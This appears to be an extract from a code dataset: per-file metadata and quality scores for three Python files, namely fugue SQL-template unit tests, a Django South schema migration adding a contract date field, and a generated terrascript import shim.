Schema (field names and dtypes were interleaved across lines in the extraction; reassembled below):

| field | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
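The qsc_code_* columns are per-file quality heuristics computed over `content`. As a rough illustration of what a few of them measure, here is a hedged sketch; the dataset's actual pipeline, tokenization, and edge-case handling are assumptions here, and the function names merely mirror the column names:

```python
# Hypothetical re-implementations of a few qsc_code_* signals.
# The real pipeline's tokenization and exact definitions are unknown here.
def qsc_code_mean_word_length(content: str) -> float:
    words = content.split()
    return sum(map(len, words)) / len(words) if words else 0.0

def qsc_code_frac_words_unique(content: str) -> float:
    words = content.split()
    return len(set(words)) / len(words) if words else 0.0

def qsc_code_frac_chars_whitespace(content: str) -> float:
    return sum(ch.isspace() for ch in content) / len(content) if content else 0.0

def qsc_code_frac_lines_assert(content: str) -> float:
    lines = content.splitlines()
    return sum(ln.lstrip().startswith("assert") for ln in lines) / len(lines) if lines else 0.0
```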

Row 1
hexsha: c718a453587f2523d16189c7363ca55c6bca7a18 | size: 2,931 | ext: py | lang: Python
max_stars_repo_path: tests/fugue_sql/test_utils.py | max_stars_repo_name: gityow/fugue | max_stars_repo_head_hexsha: e975625b33766d8b9dc64c6954871569b59367ec | max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: null | max_stars_repo_stars_event_min_datetime: null | max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: tests/fugue_sql/test_utils.py | max_issues_repo_name: gityow/fugue | max_issues_repo_head_hexsha: e975625b33766d8b9dc64c6954871569b59367ec | max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: tests/fugue_sql/test_utils.py | max_forks_repo_name: gityow/fugue | max_forks_repo_head_hexsha: e975625b33766d8b9dc64c6954871569b59367ec | max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
```python
from fugue_sql._utils import fill_sql_template


def test_fill_sql_template():
    data = {"a": 1, "b": "x"}
    assert (
        "select * from tbl where a = 1 and b = 'x'"
        == fill_sql_template("select * from tbl where a = {{a}} and b = '{{b}}'", data)
    )
    assert (
        """select * from tbl where a = 1 and b = "x" """
        == fill_sql_template("""select * from tbl where a = {{a}} and b = "{{b}}" """, data)
    )
    assert (
        """select * where b="%x" """
        == fill_sql_template("""select * where b="%{{b}}" """, data)
    )
    assert (
        """select * where b="x%" """
        == fill_sql_template("""select * where b="{{b}}%" """, data)
    )
    assert (
        """select * b like "{}%{}" """
        == fill_sql_template("""select * b like "{}%{}" """, data)
    )
    assert (
        """select * b like '%}' """
        == fill_sql_template("""select * b like '%}' """, data)
    )
    assert (
        """select * where b="%x" """
        == fill_sql_template("""select * where b="%{{b}}" """, data)
    )
    assert (
        """select * where b="x%" """
        == fill_sql_template("""select * where b="{{b}}%" """, data)
    )
    assert "a=select " == fill_sql_template("a=select ", data)
    # try single quotes for finding json patterns
    assert "a=select * from b like '{%'" == fill_sql_template(
        "a=select * from b like '{%'", data
    )
    assert "a=select * from b like '%}'" == fill_sql_template(
        "a=select * from b like '%}'", data
    )
    # try double quotes for finding json patterns
    assert 'a=select * from b like "%}"' == fill_sql_template(
        'a=select * from b like "%}"', data
    )
    assert 'a=select * from b like "{%"' == fill_sql_template(
        'a=select * from b like "{%"', data
    )
    assert "1x1" == fill_sql_template("{{a}}{{b}}{{a}}", data)
    assert "" == fill_sql_template("", data)
    assert "%s" == fill_sql_template("%s", data)
    assert "%%s" == fill_sql_template("%%s", data)
    assert "1%%sx1" == fill_sql_template("{{a}}%%s{{b}}{{a}}", data)
    assert "1" == fill_sql_template("{{a}}", {"a": 1, "self": 2})


def test_fill_sql_template_array():
    data = {"a": [0, 1, 2]}
    assert (
        """select * from tbl where a in ('0','1','2')"""
        == fill_sql_template(
            """select * from tbl where a in (
            {%- for i in a -%}
            {%- if loop.index0 < loop.length - 1 -%}'{{-i-}}',
            {%- else -%}'{{-i-}}'
            {%- endif -%}
            {%- endfor -%}
            )""", data)
    )

    def upper(word):
        return word.upper()

    data = {"a": ['a', 'b', 'c']}
    assert (
        """select * from tbl where a in ('A','B','C')"""
        == fill_sql_template(
            """select * from tbl where a in (
            {%- for i in a -%}
            {%- if loop.index0 < loop.length - 1 -%}'{{-i|upper-}}',
            {%- else -%}'{{-i|upper-}}'
            {%- endif -%}
            {%- endfor -%}
            )""", data)
    )
```
avg_line_length: 34.892857 | max_line_length: 88 | alphanum_fraction: 0.476629
qsc quality-signal values (41 cols, schema order): 364 | 2,931 | 3.692308 | 0.131868 | 0.125 | 0.267857 | 0.15625 | 0.790179 | 0.741071 | 0.741071 | 0.700893 | 0.700893 | 0.653274 | 0 | 0.009625 | 0.291027 | 2,931 | 83 | 89 | 35.313253 | 0.637151 | 0.029683 | 0 | 0.181818 | 0 | 0 | 0.342234 | 0 | 0 | 0 | 0 | 0 | 0.381818 | 1 | 0.054545 | false | 0 | 0.018182 | 0.018182 | 0.090909 | 0
qsc flag values (41 cols, schema order): 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 6
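The tests in Row 1 treat fill_sql_template as Jinja-style rendering of a SQL string. A naive approximation (a sketch, not fugue's implementation: the real helper also tolerates the bare `{%`/`%}` literals in LIKE patterns exercised above, which plain Jinja2 rejects) looks like this:

```python
from jinja2 import Template

def fill_sql_template_naive(sql: str, params: dict) -> str:
    # Drop "self", which the tests pass explicitly and which would collide
    # with Template.render()'s bound-method argument.
    safe = {k: v for k, v in params.items() if k != "self"}
    return Template(sql).render(**safe)

assert fill_sql_template_naive(
    "select * from tbl where a = {{a}} and b = '{{b}}'", {"a": 1, "b": "x"}
) == "select * from tbl where a = 1 and b = 'x'"
```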

Row 2
hexsha: c7273a3882be92bef3eeeeb2c24ebc57eaccd151 | size: 16,486 | ext: py | lang: Python
max_stars_repo_path: emma/interface/migrations/0002_auto__add_field_contract_date_signed.py | max_stars_repo_name: djangowebstudio/emma | max_stars_repo_head_hexsha: afbdaa5c02b4164687356755fddba307eb682ef4 | max_stars_repo_licenses: ["BSD-3-Clause"] | max_stars_count: null | max_stars_repo_stars_event_min_datetime: null | max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: emma/interface/migrations/0002_auto__add_field_contract_date_signed.py | max_issues_repo_name: djangowebstudio/emma | max_issues_repo_head_hexsha: afbdaa5c02b4164687356755fddba307eb682ef4 | max_issues_repo_licenses: ["BSD-3-Clause"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: emma/interface/migrations/0002_auto__add_field_contract_date_signed.py | max_forks_repo_name: djangowebstudio/emma | max_forks_repo_head_hexsha: afbdaa5c02b4164687356755fddba307eb682ef4 | max_forks_repo_licenses: ["BSD-3-Clause"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
```python
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):

    def forwards(self, orm):
        # Adding field 'Contract.date_signed'
        db.add_column('interface_contract', 'date_signed', self.gf('django.db.models.fields.DateField')(auto_now=True, default=datetime.date(2010, 6, 12), blank=True), keep_default=False)

    def backwards(self, orm):
        # Deleting field 'Contract.date_signed'
        db.delete_column('interface_contract', 'date_signed')

    models = {
        'interface.album': {
            'Meta': {'object_name': 'Album'},
            'album_identifier': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True'}),
            'album_name': ('django.db.models.fields.CharField', [], {'default': "'untitled album'", 'max_length': '255'}),
            'album_pages': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'document': ('django.db.models.fields.files.FileField', [], {'max_length': '255', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['interface.Image']"}),
            'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
        },
        'interface.albumclass': {
            'Meta': {'object_name': 'AlbumClass'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
        },
        'interface.author': {
            'Meta': {'object_name': 'Author'},
            'author': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Image']"}),
            'notes': ('django.db.models.fields.TextField', [], {}),
            'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
        },
        'interface.category': {
            'Meta': {'object_name': 'Category'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Image']"}),
            'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'image_cat': ('django.db.models.fields.CharField', [], {'max_length': '255'})
        },
        'interface.contract': {
            'Meta': {'object_name': 'Contract'},
            'contract': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'date_signed': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'user': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'username': ('django.db.models.fields.CharField', [], {'max_length': '255'})
        },
        'interface.copyright': {
            'Meta': {'object_name': 'Copyright'},
            'copyright': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'copyright_terms': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Image']"}),
            'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255'})
        },
        'interface.favorite': {
            'Meta': {'object_name': 'Favorite'},
            'album_identifier': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'album_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Image']"}),
            'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'tag': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'user': ('django.db.models.fields.CharField', [], {'max_length': '255'})
        },
        'interface.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True'}),
            'image_group': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'image_pages': ('django.db.models.fields.IntegerField', [], {'default': '0'})
        },
        'interface.image': {
            'Meta': {'object_name': 'Image'},
            'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
            'date_entered': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
            'date_modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
            'group_status': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True'}),
            'image_category': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
            'image_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'image_pages': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'image_path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'image_real_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'image_real_path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
        },
        'interface.imagecount': {
            'Meta': {'object_name': 'ImageCount'},
            'count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
        },
        'interface.keyword': {
            'Meta': {'object_name': 'Keyword'},
            'cright': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Image']"}),
            'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True'}),
            'image_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'image_path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'keywords': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'profile': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
            'source': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'subject': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
        },
        'interface.keywordcount': {
            'Meta': {'object_name': 'KeywordCount'},
            'count': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'keyword': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True'}),
            'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
        },
        'interface.mdall': {
            'MDall': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'Meta': {'object_name': 'MDAll'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Image']"}),
            'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255'})
        },
        'interface.metadata': {
            'MDall': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'Meta': {'object_name': 'Metadata'},
            'album': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'author': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'caption_writer': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'copyright': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
            'country': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'creator': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'creator_tool': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'credit': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'datetimeoriginal': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'document': ('django.db.models.fields.files.FileField', [], {'max_length': '255', 'blank': 'True'}),
            'documentname': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'file_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'headline': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Image']"}),
            'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True'}),
            'instructions': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'keyword': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Keyword']"}),
            'keywords': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'location': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'orientation': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'profile': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
            'provincestate': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'softdate': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'source': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'subject': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
        },
        'interface.order': {
            'Meta': {'object_name': 'Order'},
            'album_identifier': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'client': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'clientImage': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True'}),
            'group_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Image']"}),
            'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'resolution': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'status': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
            'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
        },
        'interface.query': {
            'Meta': {'object_name': 'Query'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'mode': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
            'query': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'user': ('django.db.models.fields.IntegerField', [], {'default': '0'})
        },
        'interface.user': {
            'Meta': {'object_name': 'User'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'order': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
            'pagesize': ('django.db.models.fields.IntegerField', [], {'default': '8'}),
            'search': ('django.db.models.fields.CharField', [], {'default': "'simple'", 'max_length': '255'}),
            'setstr1': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'setstr2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'setstr3': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'setstr4': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'setstr5': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'setting1': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
            'setting10': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'setting2': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
            'setting3': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
            'setting4': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
            'setting5': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
            'setting6': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'setting7': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'setting8': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'setting9': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'user': ('django.db.models.fields.IntegerField', [], {'default': '0'})
        }
    }

    complete_apps = ['interface']
```
avg_line_length: 73.928251 | max_line_length: 187 | alphanum_fraction: 0.546828
qsc quality-signal values (41 cols, schema order): 1,636 | 16,486 | 5.413203 | 0.09291 | 0.134598 | 0.233966 | 0.334237 | 0.854788 | 0.836043 | 0.816622 | 0.73453 | 0.668699 | 0.569896 | 0 | 0.01671 | 0.201383 | 16,486 | 222 | 188 | 74.261261 | 0.655932 | 0.005399 | 0 | 0.304762 | 0 | 0 | 0.570121 | 0.330873 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009524 | false | 0 | 0.019048 | 0 | 0.042857 | 0
qsc flag values (41 cols, schema order): 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 6
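Row 2's content is a South migration (pre-Django 1.7). Purely for orientation, the same column addition written as a modern django.db.migrations operation might look like the sketch below; the dependency name is hypothetical, and modern Django disallows combining auto_now with default (system check fields.E160), so only auto_now is kept:

```python
# Illustrative modern equivalent of the South migration above (not from this repo).
from django.db import migrations, models


class Migration(migrations.Migration):
    dependencies = [("interface", "0001_initial")]  # hypothetical predecessor

    operations = [
        migrations.AddField(
            model_name="contract",
            name="date_signed",
            # auto_now, auto_now_add, and default are mutually exclusive in
            # modern Django, so the South call's default is dropped here.
            field=models.DateField(auto_now=True, blank=True),
        ),
    ]
```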

Row 3
hexsha: c748adc3a5216b0a946f8d2fecf39d7aa4d85ebb | size: 374 | ext: py | lang: Python
max_stars_repo_path: terrascript/data/fortios.py | max_stars_repo_name: mjuenema/python-terrascript | max_stars_repo_head_hexsha: 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | max_stars_repo_licenses: ["BSD-2-Clause"] | max_stars_count: 507 | max_stars_repo_stars_event_min_datetime: 2017-07-26T02:58:38.000Z | max_stars_repo_stars_event_max_datetime: 2022-01-21T12:35:13.000Z
max_issues_repo_path: terrascript/data/fortios.py | max_issues_repo_name: mjuenema/python-terrascript | max_issues_repo_head_hexsha: 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | max_issues_repo_licenses: ["BSD-2-Clause"] | max_issues_count: 135 | max_issues_repo_issues_event_min_datetime: 2017-07-20T12:01:59.000Z | max_issues_repo_issues_event_max_datetime: 2021-10-04T22:25:40.000Z
max_forks_repo_path: terrascript/data/fortios.py | max_forks_repo_name: mjuenema/python-terrascript | max_forks_repo_head_hexsha: 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | max_forks_repo_licenses: ["BSD-2-Clause"] | max_forks_count: 81 | max_forks_repo_forks_event_min_datetime: 2018-02-20T17:55:28.000Z | max_forks_repo_forks_event_max_datetime: 2022-01-31T07:08:40.000Z
content:
```python
# terrascript/data/fortios.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:16:41 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.data.fortios
#
# instead of
#
# >>> import terrascript.data.fortinetdev.fortios
#
# This is only available for 'official' and 'partner' providers.

from terrascript.data.fortinetdev.fortios import *
```
avg_line_length: 24.933333 | max_line_length: 73 | alphanum_fraction: 0.740642
qsc quality-signal values (41 cols, schema order): 49 | 374 | 5.653061 | 0.714286 | 0.216607 | 0.158845 | 0.238267 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037152 | 0.136364 | 374 | 14 | 74 | 26.714286 | 0.820433 | 0.794118 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0
qsc flag values (41 cols, schema order): 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0
effective: 0 | hits: 6
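The shim in Row 3 means both import paths expose the same names; an illustrative check (assuming both provider modules are installed and the namespaced module defines no restrictive __all__):

```python
# Both forms resolve to the same data-source classes after the wildcard re-export.
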